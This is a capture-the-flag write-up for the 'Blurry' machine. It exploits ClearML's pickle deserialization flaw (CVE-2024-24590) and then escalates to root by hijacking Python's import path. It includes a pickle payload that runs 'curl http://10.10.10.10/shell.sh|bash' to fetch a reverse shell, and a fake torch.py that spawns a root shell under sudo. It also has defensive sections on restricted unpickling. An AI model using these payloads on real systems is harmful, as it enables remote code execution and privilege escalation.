Reconnaissance

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The nmap scan shows a redirect to app.blurry.htb, so I add this host and the parent domain blurry.htb to my /etc/hosts file.

HTTP

Browsing to http://app.blurry.htb is enough to tell that the application is ClearML, a platform to build, train and deploy AI/ML and LLM models. There's just an input field for a name, so I put mine in and press START. I'm more or less logged in, and a welcome screen shows instructions on how to set up ClearML locally.

After creating a new virtual environment, installing the required library and running clearml-init, I paste in the configuration provided on the site.

The configuration references an API server at api.blurry.htb and file storage at files.blurry.htb, so I add both to my hosts file before hitting Enter.

# Create the virtual environment

python3 -m venv venv && source venv/bin/activate

# Install the needed library and its dependencies

pip install clearml

# Run the setup script and paste configuration when asked



clearml-initAfter closing the modal with the instructions, the dashboard is visible. There are 4 recent projects with three of them being labeled with Example. The other one is Black Swan and it looks like there was some activity within the last 24 hours. The timestamps for the Recent Experiments are pretty recent, so there’s definitely something running in the background.

Hint

There's also a Rocket.Chat instance on chat.blurry.htb that shows chat messages between a few employees.

Execution

Clicking on one of the recent experiments, Review JSON Artifacts, shows its details. The EXECUTION tab contains the Python script that is running, and the INFO tab lists jippity@blurry as the creator and the ClearML version as 1.13.1.

The changelog lists several newer versions, and multiple vulnerabilities were fixed in 1.14.x, most notably CVE-2024-24590, where a maliciously uploaded artifact enables an attacker to run arbitrary code on a user's system. This appears to be related to pickle [1], Python's object serialization format.

In main(), the running script retrieves all tasks tagged review within the Black Swan project. Each task is passed to process_task() in its own process, where all artifacts of that task are retrieved. The actual object is only fetched once the .get() method is invoked, and pickled data is unpickled at that point [2].
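A minimal, harmless sketch of the mechanism: a class can define __reduce__ to tell the unpickler which callable to invoke on load. The hypothetical Payload class below names the built-in eval with a trivial expression instead of a shell command. Whoever loads it never receives a Payload object, only the callable's return value, and by then the code has already run.

```python
import pickle


class Payload:
    """Hypothetical payload: unpickling it calls eval("6 * 7")."""

    def __reduce__(self):
        # (callable, args): pickle records a reference to builtins.eval plus the argument
        return (eval, ("6 * 7",))


blob = pickle.dumps(Payload())   # pickling only records the reference; nothing runs yet
result = pickle.loads(blob)      # eval("6 * 7") is executed here, during deserialization
print(type(result).__name__, result)  # prints: int 42
```

In the review script this happens inside artifact_object.get(), so the isinstance(data, dict) check only runs after the payload has already executed.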

Warning

Pickle, like many native deserialization formats in other languages, should only be used on trusted data, because deserializing attacker-controlled input can lead to code execution. There's almost always a safer way to store data.
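When pickle cannot be avoided, the Python documentation describes overriding pickle.Unpickler.find_class so that only an allow-list of globals can be resolved. The sketch below follows that pattern; the allow-list, the class names and the Evil test object are illustrative assumptions. It only narrows what a pickle can reach; a format such as JSON, which cannot reference code at all, remains the simpler choice for plain dictionaries like the ones the review script expects.

```python
import builtins
import io
import os
import pickle

# Illustrative allow-list: harmless built-in types only.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every global referenced by the pickle (classes, functions) is resolved here.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses any global outside SAFE_BUILTINS."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Evil:
    # Would run a command under plain pickle.loads; it is only loaded restricted here.
    def __reduce__(self):
        return (os.system, ("id",))


safe = restricted_loads(pickle.dumps({"model": "demo", "epochs": 3}))
print(safe)

try:
    restricted_loads(pickle.dumps(Evil()))
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    print("blocked:", exc)
```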

#!/usr/bin/python3
from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient


def process_json_artifact(data, artifact_name):
    """
    Process a JSON artifact represented as a Python dictionary.
    Print all key-value pairs contained in the dictionary.
    """
    print(f"[+] Artifact '{artifact_name}' Contents:")
    for key, value in data.items():
        print(f" - {key}: {value}")


def process_task(task):
    artifacts = task.artifacts
    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get()
        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")


def main():
    review_task = Task.init(project_name="Black Swan",
                            task_name="Review JSON Artifacts",
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return

    threads = []
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)

    for thread in threads:
        thread.join(60)
        if thread.is_alive():
            thread.terminate()

    # Mark the ClearML task as completed
    review_task.close()


def cleanup():
    client = APIClient()
    tasks = client.tasks.get_all(
        system_tags=["archived"],
        only_fields=["id"],
        order_by=["-last_update"],
        page_size=100,
        page=0,
    )

    # delete and cleanup tasks
    for task in tasks:
        # noinspection PyBroadException
        try:
            deleted_task = Task.get_task(task_id=task.id)
            deleted_task.delete(
                delete_artifacts_and_models=True,
                skip_models_used_by_other_tasks=True,
                raise_on_error=False
            )
        except Exception as ex:
            continue


if __name__ == "__main__":
    main()
    cleanup()

The goal is simple: create a new Task in the Black Swan project with the review tag and attach a pickled object as an artifact that spawns a reverse shell when unpickled.

ClearML provides good documentation for its SDK, and creating a new Task is straightforward. The upload_artifact() method of the Task object accepts any object as input; if the object is not one of the specifically supported types, it gets pickled [3].

The RunCommand class below abuses __reduce__ so that unpickling runs a system command [4]: it downloads a reverse shell script from my HTTP server and pipes it into bash.
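Because __reduce__ does all the work, the payload can be inspected offline before uploading it. The sketch below pickles an object of the same shape (the command "id" is a placeholder and is never executed, since nothing is unpickled) and disassembles it with the standard library's pickletools; disassemble is a hypothetical helper name. The listing shows a reference to the system function followed by the REDUCE opcode, which is the call the unpickler will make.

```python
import io
import os
import pickle
import pickletools


class RunCommand:
    # Same shape as the exploit class; "id" is a harmless placeholder command.
    def __reduce__(self):
        return (os.system, ("id",))


def disassemble(obj) -> str:
    """Pickle obj (without ever loading it) and return the opcode listing."""
    blob = pickle.dumps(obj)
    out = io.StringIO()
    pickletools.dis(blob, out=out)
    return out.getvalue()


listing = disassemble(RunCommand())
print(listing)
```

On Linux the reference is recorded as posix.system, i.e. under the module name of the machine that builds the pickle; a payload built on Windows would reference nt.system and fail to load on a Linux target.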

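from clearml import Task
import os


class RunCommand:
    # __reduce__ is invoked when the object is pickled; the returned
    # (callable, args) tuple is what the unpickler calls on load
    def __reduce__(self):
        return (os.system, ('curl http://10.10.10.10/shell.sh|bash',))


command = RunCommand()

# New task in Black Swan, tagged "review" so the reviewer script picks it up;
# output_uri=True stores artifacts on the default files server
task = Task.init(project_name='Black Swan',
                 task_name='Run this',
                 tags=['review'],
                 output_uri=True)

# RunCommand is not a natively supported artifact type, so ClearML pickles it
task.upload_artifact(name='pickle_artifact',
                     artifact_object=command,
                     wait_on_upload=True,
                     extension_name='.pkl')

After running the exploit and waiting for the next review run, I get a hit on my HTTP server and a shell as jippity, with access to the first flag.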

Privilege Escalation

Right away I check jippity's sudo privileges with sudo -ln and see that I can run /usr/bin/evaluate_model as root on any file matching /models/*.pth. It is a short Bash script, so I can read its source.

sudo -ln
Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

First, the script checks that exactly one command-line argument was supplied and determines its file type. Only tar and ZIP archives are accepted and extracted to /opt/temp; anything else aborts. Every extracted file named *.pkl or pickle is then scanned with fickling. If any of them is rated OVERTLY_MALICIOUS, an error message is printed and the model file is deleted, so it is never evaluated; otherwise the original archive is passed to /models/evaluate_model.py.
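To see which archive members actually reach fickling, the extraction and filter step can be approximated in Python. This is a hypothetical re-implementation, not the script itself: zipfile.is_zipfile and tarfile.is_tarfile stand in for the file check (ZIP is tested first here, unlike the script), and wants_scan mirrors the find expression, which matches on the basename (*.pkl or exactly pickle). The helper names and the placeholder archive layouts are assumptions for illustration.

```python
import io
import os
import tarfile
import tempfile
import zipfile


def wants_scan(member_name: str) -> bool:
    """Mirror of find's -name "*.pkl" -o -name "pickle" (basename match)."""
    base = os.path.basename(member_name)
    return base.endswith(".pkl") or base == "pickle"


def members_to_scan(path: str) -> list[str]:
    """Return the regular-file members the wrapper script would hand to fickling."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            names = [i.filename for i in zf.infolist() if not i.is_dir()]
    elif tarfile.is_tarfile(path):
        with tarfile.open(path) as tf:
            names = [m.name for m in tf.getmembers() if m.isfile()]
    else:
        # The real script prints an error and exits with status 2 here.
        raise ValueError(f"unsupported format: {path}")
    return [n for n in names if wants_scan(n)]


def _demo() -> tuple[list[str], list[str]]:
    with tempfile.TemporaryDirectory() as tmp:
        # ZIP with a pickle inside a top-level folder (placeholder contents).
        zpath = os.path.join(tmp, "model.pth")
        with zipfile.ZipFile(zpath, "w") as zf:
            zf.writestr("model/data.pkl", b"placeholder")
            zf.writestr("model/version", b"3\n")
        # tar with a member literally named "pickle".
        tpath = os.path.join(tmp, "legacy.pth")
        with tarfile.open(tpath, "w") as tf:
            for name in ("pickle", "sys_info"):
                data = b"placeholder"
                info = tarfile.TarInfo(name)
                info.size = len(data)
                tf.addfile(info, io.BytesIO(data))
        return members_to_scan(zpath), members_to_scan(tpath)


zip_hits, tar_hits = _demo()
print(zip_hits, tar_hits)  # ['model/data.pkl'] ['pickle']
```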

#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/opt/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")
    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi

Within /models are the Python script called by evaluate_model and a demo_model.pth. The directory is group-writable for jippity, presumably so that new models can be placed there.

ls -la /models/
total 1068
drwxrwxr-x  2 root jippity    4096 Aug  1 11:37 .
drwxr-xr-x 19 root root       4096 Jun  3 09:28 ..
-rw-r--r--  1 root root    1077880 May 30 04:39 demo_model.pth
-rw-r--r--  1 root root       2547 May 30 04:38 evaluate_model.py

As with the previous script, I can read the source of evaluate_model.py. It loads the provided model and evaluates it against a test dataset. The more interesting part is the imports: Python searches for modules in a fixed order, starting with the directory that contains the script being run [5], and jippity can write to that directory.
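The write access comes from the group bits in the listing above: /models is owned by root, its group is jippity, and its mode is drwxrwxr-x. A small sketch of checking that bit from Python with os.stat and the stat module; group_can_write is a hypothetical helper, and it only reads the mode bits (os.access(path, os.W_OK) gives the effective answer for the current user).

```python
import os
import stat
import tempfile


def group_can_write(path: str) -> bool:
    """True if the group write bit (S_IWGRP) is set on path."""
    return bool(os.stat(path).st_mode & stat.S_IWGRP)


with tempfile.TemporaryDirectory() as tmp:
    os.chmod(tmp, 0o775)              # drwxrwxr-x, like /models
    like_models = group_can_write(tmp)
    os.chmod(tmp, 0o755)              # drwxr-xr-x, no group write
    without_group_write = group_can_write(tmp)
    os.chmod(tmp, 0o700)              # owner-only again before cleanup

print(like_models, without_group_write)  # True False
print(stat.filemode(0o040775))           # drwxrwxr-x
```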

cat evaluate_model.py
import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys


class CustomCNN(nn.Module):
    def __init__(self):
        super(CustomCNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
        self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
        self.fc2 = nn.Linear(in_features=128, out_features=10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 32 * 8 * 8)
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x


def load_model(model_path):
    model = CustomCNN()
    state_dict = torch.load(model_path)
    model.load_state_dict(state_dict)
    model.eval()
    return model


def prepare_dataloader(batch_size=32):
    transform = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.RandomCrop(32, padding=4),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
    ])
    dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
    subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
    dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
    return dataloader


def evaluate_model(model, dataloader):
    correct = 0
    total = 0
    with torch.no_grad():
        for images, labels in dataloader:
            outputs = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    accuracy = 100 * correct / total
    print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')


def main(model_path):
    model = load_model(model_path)
    print("[+] Loaded Model.")
    dataloader = prepare_dataloader()
    print("[+] Dataloader ready. Evaluating model...")
    evaluate_model(model, dataloader)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <path_to_model.pth>")
    else:
        model_path = sys.argv[1]  # Path to the .pth file
        main(model_path)
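The search-order behaviour can be reproduced safely in a scratch directory. This sketch (local_module_wins is a hypothetical helper) writes a harmless torch.py next to a tiny script that imports torch, runs that script in a fresh interpreter, and reports whether the import resolved to the local file rather than any installed copy. It assumes the interpreter is not started with -I or -P and that PYTHONSAFEPATH is unset, since those options keep the script's directory out of sys.path.

```python
import os
import subprocess
import sys
import tempfile


def local_module_wins(module_name: str = "torch") -> bool:
    """Return True if <module_name>.py next to a script shadows any installed copy."""
    with tempfile.TemporaryDirectory() as tmp:
        # Harmless stand-in module: it only defines a variable.
        with open(os.path.join(tmp, f"{module_name}.py"), "w") as fh:
            fh.write("MARKER = 'loaded from the script directory'\n")

        # Minimal "victim" script: import the module and report where it came from.
        script = os.path.join(tmp, "evaluate.py")
        with open(script, "w") as fh:
            fh.write(f"import {module_name}\nprint({module_name}.__file__)\n")

        env = dict(os.environ)
        env.pop("PYTHONSAFEPATH", None)  # would stop the script dir being prepended

        result = subprocess.run(
            [sys.executable, script],
            capture_output=True, text=True, env=env, check=True,
        )
        loaded_from = os.path.dirname(os.path.realpath(result.stdout.strip()))
        return loaded_from == os.path.realpath(tmp)


print(local_module_wins())  # True
```

This is also why env_reset in the sudoers defaults does not help: the script's directory is added to sys.path by the interpreter itself, not taken from an environment variable such as PYTHONPATH.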

I impersonate the torch module by placing a file called torch.py in /models that simply spawns bash when imported. Running /usr/bin/evaluate_model with sudo on demo_model.pth passes the fickling check, and the first import in evaluate_model.py loads my torch module, which drops me into a root shell.

# Create the malicious torch module
echo 'import os; os.system("/bin/bash")' > /models/torch.py

# Call script as root
sudo /usr/bin/evaluate_model /models/demo_model.pth
[+] Model /models/demo_model.pth is considered safe. Processing...
root@blurry:/models#

Attack Path

flowchart TD
    subgraph "Execution"
        A(Access to ClearML) -->|"Create Task\nwith\npickled payload"| B(Shell as jippity)
    end
    subgraph "Privilege Escalation"
        B -->|Hijack Python Search Path| C(Shell as root)
    end